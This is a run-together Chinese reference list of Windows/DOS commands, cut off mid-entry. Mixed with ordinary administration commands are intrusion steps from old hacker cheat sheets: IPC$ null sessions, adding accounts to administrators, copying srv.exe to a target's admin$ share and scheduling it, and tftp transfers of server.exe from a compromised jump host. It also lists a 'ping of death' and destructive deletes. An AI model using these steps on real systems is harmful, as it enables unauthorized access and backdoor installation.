DOS命令字典netuse\\ip\ipc$/user:建立IPC空链接netuse\\ip\ipc$密码/user:用户名建立IPC非空链接netuseh:\\ip\c$密码/user:用户名直接登陆后映射对方C:到本地为H:netuseh:\\ip\c$登陆后映射对方C:到本地为H:netuse\\ip\ipc$/del删除IPC链接netuseh:/del删除映射对方到本地的为H:的映射netuser用户名密码/add建立用户netuserguest/active:yes激活guest用户netuser查看有哪些用户netuser帐户名查看帐户的属性netlocalgroupadministrators用户名/add把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数netstart查看开启了哪些服务netstart服务名开启服务;(如:netstarttelnet,netstartschedule)netstop服务名停止某服务nettime\\目标ip查看对方时间nettime\\目标ip/set设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息netview查看本地局域网内开启了哪些共享netview\\ip查看对方局域网内开启了哪些共享netconfig显示系统网络设置netlogoff断开连接的共享netpause服务名暂停某服务netsendip文本信息向对方发信息netver局域网内正在使用的网络连接类型和信息netshare查看本地开启的共享netshareipc$开启ipc$共享netshareipc$/del删除ipc$共享netsharec$/del删除C:共享netuserguest12345用guest用户登陆后用将密码改为12345netpassword密码更改系统登陆密码netstat-a查看开启了哪些端口,常用netstat-annetstat-n查看端口的网络连接情况,常用netstat-annetstat-v查看正在进行的工作netstat-p协议名例:netstat-ptcq/ip查看某协议使用情况(查看tcp/ip协议使用情况)netstat-s查看正在使用的所有协议使用情况nbtstat-Aip对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert-参数ip(或计算机名)跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。pingip(或域名)向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。ping-t-l65550ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息tlist-t以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)kill-F进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)del-F文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR*.*”表示删除当前目录下所有只读文件,“DEL/A-S*.*”表示删除当前目录下除系统文件以外的所有文件#2二:del/S/Q目录或用:rmdir/s/Q目录/S删除目录及目录下的所有子目录和文件。同时使用参数/Q可取消删除操作时的系统确认就直接删除。(二个命令作用相同)move盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖fcone.txttwo.txt3st.txt对比二个文件并把不同之处输出到3st.txt文件中,和是重定向命令atid号开启已注册的某个计划任务at/delete停止所有计划任务,用参数/yes则不需要确认就直接停止atid号/delete停止某个已注册的计划任务at查看所有的计划任务at\\iptime程序名(或一个命令)/r在某时间运行对方某程序并重新启动计算机fingerusername@host查看最近有哪些用户登陆telnetip端口远和登陆服务器,默认端口为23openip连接到IP(属telnet登陆后的命令)telnet在本机上直接键入telnet将进入本机的telnetcopy路径\文件名1路径\文件名2/y复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件copyc:\srv.exe\\ip\admin$复制本地c:\srv.exe到对方的admin下cppy1st.jpg/b+2st.txt/a3st.jpg将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件copy\\ip\admin$\svv.exec:\或:copy\\ip\admin$\*.*复制对方admini$共享下的srv.exe文件(所有文件)至本地C:xcopy要复制的文件或目录树目标地址\目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件tftp-i自己IP(用肉机作跳板时这用肉机IP)getserver.exec:\server.exe登陆后,将“IP”的server.exe下载到目标主机c:\server.exe参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i则以ASCII模式(传送文本文件模式)进行传送tftp-i对方IPputc:\server.exe登陆后,上传本地c:\server.exe至主机ftpip端口用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)routeprint显示出IP路由,将主要显示网络地址Networkaddres,子网掩码Netmask,网关地址Gatewayaddres,接口地址Interfacearp查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp-a将显示出全部信息start程序名或命令/max或/min新开一个新窗口并最大化(最小化)运行某程序或命令mem查看cpu使用情况attrib文件名(目录名)查看某文件(目录)的属性attrib文件名-A-R-S-H或+A+R+S+H去掉(添加)某文件的存档,只读,系统,隐藏属性;用+则是添加为某属性dir查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间date/t、time/t使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间set指定环境变量名称=要指派给变量的字符设置环境变量set显示当前所有的环境变量setp(或其它字符)显示出当前以字符p(或其它字符)开头的所有环境变量pause暂停批处理程序,并显示出:请按任意键继续....if在批处理程序中执行条件处理(更多说明见if命令及变量)goto标签将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)call路径\批处理文件名从批处理程序中调用另一个批处理程序(更多说明见call/?)for对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)echoon或off打开或关闭echo,仅用echo不加参数则显示当前echo设置echo信息在屏幕上显示出信息echo信息pass.txt将信息保存到pass.txt文件中findstrHelloaa.txt在aa.txt文件中寻找字符串hellofind文件名查找某文件title标题名字更改CMD窗口标题名字color颜色值设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白prompt名称更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\)#3三:ver在DOS窗口下显示版本信息winver弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)format盘符/FS:类型格式化磁盘,类型:FAT、FAT32、NTFS,例:FormatD:/FS:NTFSmd目录名创建目录replace源文件要替换文件的目录替换文件ren原文件名新文件名重命名文件名tree以树形结构显示出目录,用参数-f将列出第个文件夹中文件名称type文件名显示文本文件的内容more文件名逐屏显示输出文件doskey要锁定的命令=字符doskey要解锁命令=为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskeydir=entsky(不能用doskeydir=dir);解锁:doskeydir=taskmgr调出任务管理器chkdsk/FD:检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误tlntadmntelnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口exit退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exepath路径\可执行文件的文件名为可执行文件设置一个路径。cmd启动一个win2K命令解释窗口。参数:/eff、/en关闭、开启命令扩展;更我详细说明见cmd/?regedit/s注册表文件名导入注册表;参数/S指安静模式导入,无任何提示;regedit/e注册表文件名导出注册表cacls文件名参数显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D用户名:设定拒绝某用户访问;/P用户名:perm替换指定用户的访问权限;/G用户名:perm赋予指定用户访问权限;Perm可以是:N无,R读取,W写入,C更改(写入),F完全控制;例:caclsD:\test.txt/Dpub设定d:\test.txt拒绝pub用户访问。cacls文件名查看文件的访问用户权限列表REM文本内容在批处理文件中添加注解netsh查看或更改本地网络配置情况#4四:IIS服务命令:iisreset/reboot重启win2k计算机(但有提示系统将重启信息出现)iisreset/start或stop启动(停止)所有Internet服务iisreset/restart停止然后重新启动所有Internet服务iisreset/status显示所有Internet服务状态iisreset/enable或disable在本地系统上启用(禁用)Internet服务的重新启动iisreset/rebootonerror当启动、停止或重新启动Internet服务时,若发生错误将重新开机iisreset/noforce若无法停止Internet服务,将不会强制终止Internet服务iisreset/timeoutVal在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。FTP命令:(后面有详细说明内容)ftp的命令行格式为:ftp-v-d-i-n-g[主机名]-v显示远程服务器的所有响应信息。-d使用调试方式。-n限制ftp的自动登录,即不使